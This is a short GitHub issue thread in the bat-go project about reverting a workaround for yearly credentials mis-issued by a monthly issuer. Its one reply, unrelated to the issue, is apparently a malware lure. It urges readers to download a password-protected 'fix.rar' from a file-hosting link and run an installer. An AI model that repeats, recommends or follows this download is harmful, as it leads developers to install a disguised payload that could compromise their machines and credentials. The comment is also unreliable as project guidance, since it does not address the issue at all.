### ISSUE TITLE
Revert yearly leo credentialing mixup workaround

### ISSUE THREAD

**Issue by evq** [brave-intl/bat-go#2649]
we should revert https://github.com/brave-intl/bat-go/pull/2647 in ~8 days when we are sure that there can no longer be credentials for the year issuer that were mis-issued by the monthly issuer.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
